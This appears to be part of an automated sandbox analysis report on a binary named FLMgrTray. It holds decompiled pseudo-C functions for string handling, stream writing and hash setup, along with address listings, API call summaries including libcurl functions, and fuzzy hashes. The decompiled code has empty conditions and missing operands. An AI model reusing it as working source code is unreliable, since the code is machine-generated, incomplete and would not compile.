                                                                                        					L7:
                                                                                        					_t95 =  >  ? 0x7fffffff : _t134 | 0x0000000f;
                                                                                        					_v76 = _t95;
                                                                                        					_t136 = _t95 + 1;
                                                                                        					if(_t136 < 0x1000) {
                                                                                        						if(_t136 == 0) {
                                                                                        							_t137 = 0;
                                                                                        						} else {
                                                                                        							_push(_t136);
                                                                                        							_t124 = E00175703();
                                                                                        							_t164 = _t164 + 4;
                                                                                        							_t137 = _t124;
                                                                                        						}
                                                                                        						L13:
                                                                                        						_v44 = _t137;
                                                                                        						memcpy(_t137, _t157, _v80 + 1);
                                                                                        						_t164 = _t164 + 0xc;
                                                                                        						_t149 = _v72;
                                                                                        						_v28 = _v80;
                                                                                        						_v24 = _v76;
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					_t125 = _t136 + 0x23;
                                                                                        					_t126 =  <=  ? 0xffffffff : _t125;
                                                                                        					_push( <=  ? 0xffffffff : _t125);
                                                                                        					_t127 = E00175703();
                                                                                        					_t164 = _t164 + 4;
                                                                                        					if(_t127 == 0) {
                                                                                        						goto L37;
                                                                                        					}
                                                                                        					_t21 = _t127 + 0x23; // 0x23
                                                                                        					_t137 = _t21 & 0xffffffe0;
                                                                                        					 *((intOrPtr*)(_t137 - 4)) = _t127;
                                                                                        					goto L13;
                                                                                        				}
                                                                                        			}























































                                                                                        0x00167380
                                                                                        0x00167383
                                                                                        0x00167385
                                                                                        0x00167390
                                                                                        0x00167391
                                                                                        0x00167394
                                                                                        0x00167399
                                                                                        0x0016739b
                                                                                        0x001673a0
                                                                                        0x001673a4
                                                                                        0x001673ac
                                                                                        0x001673af
                                                                                        0x001673b1
                                                                                        0x001673b7
                                                                                        0x001673ba
                                                                                        0x001673bc
                                                                                        0x001673c1
                                                                                        0x00167621
                                                                                        0x00167624
                                                                                        0x0016763b
                                                                                        0x0016763b
                                                                                        0x001673ca
                                                                                        0x001673cd
                                                                                        0x001673cf
                                                                                        0x001673d3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001673e0
                                                                                        0x001673e4
                                                                                        0x001673e7
                                                                                        0x001673ea
                                                                                        0x001673f1
                                                                                        0x001673f8
                                                                                        0x001673fb
                                                                                        0x001673fd
                                                                                        0x001673fd
                                                                                        0x00167402
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00167404
                                                                                        0x00167407
                                                                                        0x0016740a
                                                                                        0x00167411
                                                                                        0x00167494
                                                                                        0x00167494
                                                                                        0x00167497
                                                                                        0x001674a0
                                                                                        0x001674b6
                                                                                        0x001674b9
                                                                                        0x001674c0
                                                                                        0x001674cb
                                                                                        0x001674d2
                                                                                        0x001674d6
                                                                                        0x001674d9
                                                                                        0x001674dc
                                                                                        0x001674e1
                                                                                        0x001674eb
                                                                                        0x001674f4
                                                                                        0x001674f7
                                                                                        0x001674f9
                                                                                        0x001674f9
                                                                                        0x001674fc
                                                                                        0x00167503
                                                                                        0x0016750f
                                                                                        0x00167512
                                                                                        0x0016751a
                                                                                        0x0016751f
                                                                                        0x00167523
                                                                                        0x00167526
                                                                                        0x0016752d
                                                                                        0x0016755b
                                                                                        0x00167562
                                                                                        0x0016756a
                                                                                        0x00167570
                                                                                        0x0016757b
                                                                                        0x0016757e
                                                                                        0x00167587
                                                                                        0x0016758a
                                                                                        0x00167594
                                                                                        0x00167597
                                                                                        0x0016759d
                                                                                        0x001675c7
                                                                                        0x001675c7
                                                                                        0x001675ce
                                                                                        0x001675f4
                                                                                        0x001675f6
                                                                                        0x001675fc
                                                                                        0x0016760c
                                                                                        0x00167611
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00167613
                                                                                        0x00000000
                                                                                        0x00167613
                                                                                        0x00167600
                                                                                        0x00167600
                                                                                        0x00167602
                                                                                        0x00167604
                                                                                        0x00167606
                                                                                        0x00000000
                                                                                        0x00167600
                                                                                        0x001675d0
                                                                                        0x001675d7
                                                                                        0x001675f0
                                                                                        0x001675f0
                                                                                        0x00000000
                                                                                        0x001675f0
                                                                                        0x001675e0
                                                                                        0x001675e5
                                                                                        0x001675e7
                                                                                        0x001675ee
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001675ee
                                                                                        0x00000000
                                                                                        0x001675e0
                                                                                        0x0016759f
                                                                                        0x001675a2
                                                                                        0x001675a3
                                                                                        0x001675ab
                                                                                        0x001675bd
                                                                                        0x001675bd
                                                                                        0x001675bf
                                                                                        0x001675c4
                                                                                        0x00000000
                                                                                        0x001675c4
                                                                                        0x001675ad
                                                                                        0x001675b0
                                                                                        0x001675bb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016752f
                                                                                        0x0016752f
                                                                                        0x00167532
                                                                                        0x00167533
                                                                                        0x0016753b
                                                                                        0x00167551
                                                                                        0x00167551
                                                                                        0x00167553
                                                                                        0x00167558
                                                                                        0x00000000
                                                                                        0x00167558
                                                                                        0x0016753d
                                                                                        0x00167540
                                                                                        0x0016754b
                                                                                        0x0016761b
                                                                                        0x0016761b
                                                                                        0x00000000
                                                                                        0x0016761b
                                                                                        0x00000000
                                                                                        0x0016754b
                                                                                        0x0016752d
                                                                                        0x001674a2
                                                                                        0x001674ac
                                                                                        0x00000000
                                                                                        0x00167417
                                                                                        0x00167426
                                                                                        0x00167429
                                                                                        0x0016742c
                                                                                        0x00167435
                                                                                        0x00167462
                                                                                        0x00167471
                                                                                        0x00167464
                                                                                        0x00167464
                                                                                        0x00167465
                                                                                        0x0016746a
                                                                                        0x0016746d
                                                                                        0x0016746d
                                                                                        0x00167473
                                                                                        0x00167477
                                                                                        0x0016747d
                                                                                        0x00167485
                                                                                        0x00167488
                                                                                        0x0016748b
                                                                                        0x00167491
                                                                                        0x00000000
                                                                                        0x00167491
                                                                                        0x00167437
                                                                                        0x00167441
                                                                                        0x00167444
                                                                                        0x00167445
                                                                                        0x0016744a
                                                                                        0x0016744f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00167455
                                                                                        0x00167458
                                                                                        0x0016745b
                                                                                        0x00000000
                                                                                        0x0016745b

                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,2C80D730), ref: 0016747D
                                                                                        • curl_slist_append.LIBCURL(?,?,00000000,00000000,?,?,00190114,00000002,?,2C80D730), ref: 0016756A
                                                                                        • curl_easy_setopt.LIBCURL(?,00002727,00000000), ref: 0016757E
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0016761B
                                                                                          • Part of subcall function 00175703: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(2C80D730,?,00163245,2C80D730,?,string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000), ref: 00175718
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturncurl_easy_setoptcurl_slist_appendmallocmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1096425249-0
                                                                                        • Opcode ID: 6a49f4085d9b32e1e8ce12ea9f6dc631e282a6002d5df9e2b30b5e566fc8198c
                                                                                        • Instruction ID: a687dd765fe6555076f9ca7d914632ab387e51f1f5fd52defa950ac36b15b45e
                                                                                        • Opcode Fuzzy Hash: 6a49f4085d9b32e1e8ce12ea9f6dc631e282a6002d5df9e2b30b5e566fc8198c
                                                                                        • Instruction Fuzzy Hash: 9A917B71A04648DFDB18CF68CD88BADBBF1FF49314F148669E41AAB2D1D730A991CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00165951
                                                                                        • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 0016599E
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,7FFFFFFF), ref: 00165A05
                                                                                        • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 00165A90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: D@std@@@std@@Pninc@?$basic_streambuf@U?$char_traits@$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 519940707-0
                                                                                        • Opcode ID: ae41f26f01e123f10403c3260a19a92cfb002fac775ddcf0abfe86342925db5f
                                                                                        • Instruction ID: c8b4a74f67fe5912fe424337e4e3ae5a9fab4b05a3909d1eb91c115efd074a88
                                                                                        • Opcode Fuzzy Hash: ae41f26f01e123f10403c3260a19a92cfb002fac775ddcf0abfe86342925db5f
                                                                                        • Instruction Fuzzy Hash: 71516A75600A04DFCB28CF6CD89096AF7F6FF99324B50866AE89687B90D731BD50CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 63%
                                                                                        			E00169F00(void* __ebx, void* __ecx, void* __edi, signed char* _a4, intOrPtr _a8) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				void _v24;
                                                                                        				signed int _v28;
                                                                                        				unsigned int _v32;
                                                                                        				signed int _v36;
                                                                                        				intOrPtr* _v40;
                                                                                        				intOrPtr _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				void* __esi;
                                                                                        				signed int _t62;
                                                                                        				signed char* _t65;
                                                                                        				void* _t77;
                                                                                        				void _t79;
                                                                                        				void _t82;
                                                                                        				void _t88;
                                                                                        				signed int _t92;
                                                                                        				void* _t93;
                                                                                        				unsigned int _t97;
                                                                                        				intOrPtr* _t98;
                                                                                        				void* _t105;
                                                                                        				unsigned int _t107;
                                                                                        				void* _t109;
                                                                                        				signed int _t113;
                                                                                        				unsigned int _t114;
                                                                                        				int _t115;
                                                                                        				int _t117;
                                                                                        				void* _t119;
                                                                                        				intOrPtr* _t121;
                                                                                        				void* _t125;
                                                                                        				intOrPtr _t126;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018D200);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t126 = _t125 - 0x18;
                                                                                        				_t62 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t62 ^ _t123);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v20 = _t126;
                                                                                        				_t119 = __ecx;
                                                                                        				_v40 = __ecx;
                                                                                        				_t65 = _a4;
                                                                                        				_v8 = 0;
                                                                                        				asm("o16 nop [eax+eax]");
                                                                                        				while(_t65 != _a8) {
                                                                                        					_t92 =  *(_t119 + 0x10);
                                                                                        					_t97 =  *(_t119 + 0x14);
                                                                                        					_v36 = _t92;
                                                                                        					_t107 =  *_t65 & 0x0000ffff;
                                                                                        					_v32 = _t107;
                                                                                        					_v28 = _t97;
                                                                                        					if(_t92 >= _t97) {
                                                                                        						if(0x7ffffffe - _t92 < 1) {
                                                                                        							E001631F0(_t107);
                                                                                        							_t98 = _v40;
                                                                                        							E00163190(_t98, _t119);
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							L0018C89A();
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							_push(_t119);
                                                                                        							_t121 = _t98;
                                                                                        							 *((char*)(_t121 + 0x68)) = 0;
                                                                                        							 *((intOrPtr*)(_t121 + 0x14)) = 0;
                                                                                        							 *((intOrPtr*)(_t121 + 0x10)) = 0;
                                                                                        							 *_t121 = 0x67452301;
                                                                                        							 *((intOrPtr*)(_t121 + 4)) = 0xefcdab89;
                                                                                        							 *((intOrPtr*)(_t121 + 8)) = 0x98badcfe;
                                                                                        							 *((intOrPtr*)(_t121 + 0xc)) = 0x10325476;
                                                                                        							E0016B130(_t98, _v52, _v48);
                                                                                        							return _t121;
                                                                                        						} else {
                                                                                        							_t113 = _t92 + 0x00000001 | 0x00000007;
                                                                                        							if(_t113 <= 0x7ffffffe) {
                                                                                        								_t107 = _t97 >> 1;
                                                                                        								if(_t97 <= 0x7ffffffe - _t107) {
                                                                                        									_t114 =  <  ? _t107 + _t97 : _t113;
                                                                                        								} else {
                                                                                        									_t114 = 0x7ffffffe;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t114 = 0x7ffffffe;
                                                                                        							}
                                                                                        							_t23 = _t114 + 1; // 0x7fffffff
                                                                                        							_t77 = E00163260(_t107, _t23);
                                                                                        							_v24 = _t77;
                                                                                        							 *(_t119 + 0x10) = _t92 + 1;
                                                                                        							 *(_t119 + 0x14) = _t114;
                                                                                        							if(_v28 < 8) {
                                                                                        								L18:
                                                                                        								_t115 = _t92 + _t92;
                                                                                        								memcpy(_t77, _t119, _t115);
                                                                                        								_t79 = _v24;
                                                                                        								_t126 = _t126 + 0xc;
                                                                                        								 *((short*)(_t115 + _t79)) = _v32;
                                                                                        								 *((short*)(_t115 + _t79 + 2)) = 0;
                                                                                        								 *_t119 = _t79;
                                                                                        								_t65 =  &(_a4[1]);
                                                                                        								_a4 = _t65;
                                                                                        							} else {
                                                                                        								_t93 =  *_t119;
                                                                                        								_t117 = _v36 + _v36;
                                                                                        								memcpy(_t77, _t93, _t117);
                                                                                        								_t82 = _v24;
                                                                                        								_t126 = _t126 + 0xc;
                                                                                        								 *((short*)(_t117 + _t82)) = _v32;
                                                                                        								 *((short*)(_t117 + _t82 + 2)) = 0;
                                                                                        								_t83 = _v28;
                                                                                        								_t105 = 2 + _v28 * 2;
                                                                                        								if(_t105 < 0x1000) {
                                                                                        									L16:
                                                                                        									_push(_t105);
                                                                                        									E00175733(_t83, _t93);
                                                                                        									_t126 = _t126 + 8;
                                                                                        									 *_t119 = _v24;
                                                                                        									_t65 =  &(_a4[1]);
                                                                                        									_a4 = _t65;
                                                                                        								} else {
                                                                                        									_t109 =  *(_t93 - 4);
                                                                                        									_t105 = _t105 + 0x23;
                                                                                        									_t92 = _t93 - _t109;
                                                                                        									_t77 = _t92 - 4;
                                                                                        									if(_t77 > 0x1f) {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										goto L18;
                                                                                        									} else {
                                                                                        										_t93 = _t109;
                                                                                        										goto L16;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        							continue;
                                                                                        						}
                                                                                        					} else {
                                                                                        						 *(_t119 + 0x10) = _t92 + 1;
                                                                                        						_t88 = _t119;
                                                                                        						if(_t97 >= 8) {
                                                                                        							_t88 =  *_t119;
                                                                                        						}
                                                                                        						 *(_t88 + _t92 * 2) = _t107;
                                                                                        						 *((short*)(_t88 + 2 + _t92 * 2)) = 0;
                                                                                        						_t65 =  &(_a4[1]);
                                                                                        						_a4 = _t65;
                                                                                        						continue;
                                                                                        					}
                                                                                        					L22:
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return _t65;
                                                                                        				goto L22;
                                                                                        			}



































                                                                                        0x00169f03
                                                                                        0x00169f05
                                                                                        0x00169f10
                                                                                        0x00169f11
                                                                                        0x00169f17
                                                                                        0x00169f1e
                                                                                        0x00169f22
                                                                                        0x00169f28
                                                                                        0x00169f2b
                                                                                        0x00169f2d
                                                                                        0x00169f30
                                                                                        0x00169f33
                                                                                        0x00169f3a
                                                                                        0x00169f40
                                                                                        0x00169f4d
                                                                                        0x00169f50
                                                                                        0x00169f53
                                                                                        0x00169f56
                                                                                        0x00169f59
                                                                                        0x00169f5c
                                                                                        0x00169f61
                                                                                        0x00169f90
                                                                                        0x0016a08f
                                                                                        0x0016a094
                                                                                        0x0016a097
                                                                                        0x0016a09c
                                                                                        0x0016a09e
                                                                                        0x0016a0a0
                                                                                        0x0016a0a5
                                                                                        0x0016a0a6
                                                                                        0x0016a0a7
                                                                                        0x0016a0a8
                                                                                        0x0016a0a9
                                                                                        0x0016a0aa
                                                                                        0x0016a0ab
                                                                                        0x0016a0ac
                                                                                        0x0016a0ad
                                                                                        0x0016a0ae
                                                                                        0x0016a0af
                                                                                        0x0016a0b3
                                                                                        0x0016a0b7
                                                                                        0x0016a0bc
                                                                                        0x0016a0c0
                                                                                        0x0016a0c7
                                                                                        0x0016a0ce
                                                                                        0x0016a0d4
                                                                                        0x0016a0db
                                                                                        0x0016a0e2
                                                                                        0x0016a0e9
                                                                                        0x0016a0f2
                                                                                        0x00169f96
                                                                                        0x00169f99
                                                                                        0x00169fa2
                                                                                        0x00169fb2
                                                                                        0x00169fb8
                                                                                        0x00169fc6
                                                                                        0x00169fba
                                                                                        0x00169fba
                                                                                        0x00169fba
                                                                                        0x00169fa4
                                                                                        0x00169fa4
                                                                                        0x00169fa4
                                                                                        0x00169fc9
                                                                                        0x00169fcf
                                                                                        0x00169fdb
                                                                                        0x00169fde
                                                                                        0x00169fe1
                                                                                        0x00169fe4
                                                                                        0x0016a04e
                                                                                        0x0016a04e
                                                                                        0x0016a054
                                                                                        0x0016a059
                                                                                        0x0016a05c
                                                                                        0x0016a062
                                                                                        0x0016a068
                                                                                        0x0016a06d
                                                                                        0x0016a072
                                                                                        0x0016a073
                                                                                        0x00169fe6
                                                                                        0x00169fe9
                                                                                        0x00169feb
                                                                                        0x00169ff0
                                                                                        0x00169ff5
                                                                                        0x00169ff8
                                                                                        0x00169ffe
                                                                                        0x0016a004
                                                                                        0x0016a009
                                                                                        0x0016a00c
                                                                                        0x0016a019
                                                                                        0x0016a02d
                                                                                        0x0016a02d
                                                                                        0x0016a02f
                                                                                        0x0016a037
                                                                                        0x0016a03a
                                                                                        0x0016a03f
                                                                                        0x0016a040
                                                                                        0x0016a01b
                                                                                        0x0016a01b
                                                                                        0x0016a01e
                                                                                        0x0016a021
                                                                                        0x0016a023
                                                                                        0x0016a029
                                                                                        0x0016a048
                                                                                        0x00000000
                                                                                        0x0016a02b
                                                                                        0x0016a02b
                                                                                        0x00000000
                                                                                        0x0016a02b
                                                                                        0x0016a029
                                                                                        0x0016a019
                                                                                        0x00000000
                                                                                        0x00169fe4
                                                                                        0x00169f63
                                                                                        0x00169f66
                                                                                        0x00169f69
                                                                                        0x00169f6e
                                                                                        0x00169f70
                                                                                        0x00169f70
                                                                                        0x00169f74
                                                                                        0x00169f78
                                                                                        0x00169f80
                                                                                        0x00169f81
                                                                                        0x00000000
                                                                                        0x00169f81
                                                                                        0x00000000
                                                                                        0x00169f61
                                                                                        0x0016a07e
                                                                                        0x0016a08c
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,2C80D730), ref: 00169FF0
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0016A048
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,2C80D730), ref: 0016A054
                                                                                        • _CxxThrowException.VCRUNTIME140(00000000,00000000,2C80D730), ref: 0016A0A0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$ExceptionThrow_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2284209534-0
                                                                                        • Opcode ID: 1bf03a790701677e5aecc82e9d5cefb94b6274c79a6860c502a8a2f0b5e8d766
                                                                                        • Instruction ID: f836129070b57eac7e7080bc960a43f92d459fb4964ee825f3e745343c87b865
                                                                                        • Opcode Fuzzy Hash: 1bf03a790701677e5aecc82e9d5cefb94b6274c79a6860c502a8a2f0b5e8d766
                                                                                        • Instruction Fuzzy Hash: 6851A071A04205DFCB14DF68D881AAEBBF5FF49300F218669F41ADB351D730AA54CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 77%
                                                                                        			E00184FF0(void* __ecx, int _a4) {
                                                                                        				signed int _v8;
                                                                                        				char _v40;
                                                                                        				char _v43;
                                                                                        				int _v44;
                                                                                        				char _v48;
                                                                                        				char _v52;
                                                                                        				void* __ebp;
                                                                                        				signed int _t36;
                                                                                        				void* _t49;
                                                                                        				void* _t53;
                                                                                        				void* _t57;
                                                                                        				int _t65;
                                                                                        				signed int _t69;
                                                                                        				signed int _t76;
                                                                                        				intOrPtr _t80;
                                                                                        				intOrPtr* _t92;
                                                                                        				int _t94;
                                                                                        				void* _t98;
                                                                                        				signed int _t99;
                                                                                        
                                                                                        				_t36 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v8 = _t36 ^ _t99;
                                                                                        				_t65 = _a4;
                                                                                        				_t98 = __ecx;
                                                                                        				if(_t65 != 0xffffffff) {
                                                                                        					_t39 =  *( *(__ecx + 0x20));
                                                                                        					if(_t39 == 0 || _t39 >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) + _t39) {
                                                                                        						if( *(_t98 + 0x4c) == 0) {
                                                                                        							L18:
                                                                                        							return E001755F4(_v8 ^ _t99);
                                                                                        						} else {
                                                                                        							_t92 =  *((intOrPtr*)(_t98 + 0xc));
                                                                                        							if( *_t92 == _t98 + 0x3c) {
                                                                                        								_t80 =  *((intOrPtr*)(_t98 + 0x50));
                                                                                        								 *_t92 = _t80;
                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x1c)))) = _t80;
                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x2c)))) =  *((intOrPtr*)(_t98 + 0x54)) - _t80;
                                                                                        							}
                                                                                        							_t69 =  *(_t98 + 0x38);
                                                                                        							if(_t69 != 0) {
                                                                                        								_v44 = _t65;
                                                                                        								_t39 = _t98 + 0x40;
                                                                                        								__imp__?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z(_t39,  &_v44,  &_v43,  &_v52,  &_v40,  &_v8,  &_v48);
                                                                                        								if(_t39 < 0) {
                                                                                        									goto L18;
                                                                                        								} else {
                                                                                        									if(_t39 <= 1) {
                                                                                        										_t49 =  &_v40;
                                                                                        										_t94 = _v48 - _t49;
                                                                                        										if(_t94 == 0 || _t94 == fwrite(_t49, 1, _t94,  *(_t98 + 0x4c))) {
                                                                                        											_t39 =  &_v44;
                                                                                        											 *((char*)(_t98 + 0x3d)) = 1;
                                                                                        											if(_v52 ==  &_v44) {
                                                                                        												goto L18;
                                                                                        											} else {
                                                                                        												return E001755F4(_v8 ^ _t99);
                                                                                        											}
                                                                                        										} else {
                                                                                        											goto L18;
                                                                                        										}
                                                                                        									} else {
                                                                                        										if(_t39 != 3) {
                                                                                        											goto L18;
                                                                                        										} else {
                                                                                        											E00184890(_v44,  *(_t98 + 0x4c));
                                                                                        											_t73 =  !=  ? _t65 : _t69 | 0xffffffff;
                                                                                        											_t53 =  !=  ? _t65 : _t69 | 0xffffffff;
                                                                                        											return E001755F4(_v8 ^ _t99);
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        								fputc(_t65,  *(_t98 + 0x4c));
                                                                                        								_t76 = _t69 | 0xffffffff;
                                                                                        								_t77 =  !=  ? _t65 : _t76;
                                                                                        								_t57 =  !=  ? _t65 : _t76;
                                                                                        								return E001755F4(_v8 ^ _t99);
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						__imp__?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ();
                                                                                        						 *_t39 = _t65;
                                                                                        						return E001755F4(_v8 ^ _t99);
                                                                                        					}
                                                                                        				} else {
                                                                                        					return E001755F4(_v8 ^ _t99);
                                                                                        				}
                                                                                        			}






















                                                                                        0x00184ff6
                                                                                        0x00184ffd
                                                                                        0x00185001
                                                                                        0x00185005
                                                                                        0x0018500a
                                                                                        0x00185023
                                                                                        0x00185027
                                                                                        0x00185055
                                                                                        0x0018514a
                                                                                        0x0018515d
                                                                                        0x0018505b
                                                                                        0x0018505b
                                                                                        0x00185063
                                                                                        0x00185068
                                                                                        0x0018506d
                                                                                        0x00185072
                                                                                        0x00185077
                                                                                        0x00185077
                                                                                        0x00185079
                                                                                        0x0018507e
                                                                                        0x001850b0
                                                                                        0x001850c8
                                                                                        0x001850cc
                                                                                        0x001850d4
                                                                                        0x00000000
                                                                                        0x001850d6
                                                                                        0x001850d9
                                                                                        0x0018510e
                                                                                        0x00185111
                                                                                        0x00185113
                                                                                        0x00185129
                                                                                        0x0018512c
                                                                                        0x00185133
                                                                                        0x00000000
                                                                                        0x00185135
                                                                                        0x00185147
                                                                                        0x00185147
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001850db
                                                                                        0x001850de
                                                                                        0x00000000
                                                                                        0x001850e0
                                                                                        0x001850e6
                                                                                        0x001850f3
                                                                                        0x001850f8
                                                                                        0x00185108
                                                                                        0x00185108
                                                                                        0x001850de
                                                                                        0x001850d9
                                                                                        0x00185080
                                                                                        0x00185087
                                                                                        0x00185090
                                                                                        0x00185095
                                                                                        0x0018509a
                                                                                        0x001850aa
                                                                                        0x001850aa
                                                                                        0x0018507e
                                                                                        0x00185034
                                                                                        0x00185034
                                                                                        0x0018503b
                                                                                        0x0018504d
                                                                                        0x0018504d
                                                                                        0x0018500d
                                                                                        0x0018501d
                                                                                        0x0018501d

                                                                                        APIs
                                                                                        • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 00185034
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: D@std@@@std@@Pninc@?$basic_streambuf@U?$char_traits@
                                                                                        • String ID:
                                                                                        • API String ID: 3551493264-0
                                                                                        • Opcode ID: 29f26178f8b4c594e050ec3e5f41679acac68e0d776fcc705f7581db7c9cc6fb
                                                                                        • Instruction ID: e36574278d464c6c3f8658147905c22a2c68708542264c6f3e038a0583103c75
                                                                                        • Opcode Fuzzy Hash: 29f26178f8b4c594e050ec3e5f41679acac68e0d776fcc705f7581db7c9cc6fb
                                                                                        • Instruction Fuzzy Hash: 98416232A00508DFCB14DF68D9819AEB7FAEF58325B10466FE906D7680DB31EA54CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 31%
                                                                                        			E0016A8A0(void* __ecx, signed int _a4) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				signed int _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				intOrPtr _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				intOrPtr _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				intOrPtr _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				intOrPtr _v68;
